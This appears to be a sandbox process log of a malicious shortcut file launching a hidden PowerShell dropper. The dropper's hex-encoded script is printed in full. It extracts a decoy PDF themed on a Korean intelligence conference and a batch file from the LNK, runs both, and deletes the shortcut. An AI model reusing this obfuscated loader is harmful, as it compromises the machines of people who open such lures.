cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\KOREAN~1.LNK
2616cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
2752cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
2848powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
2892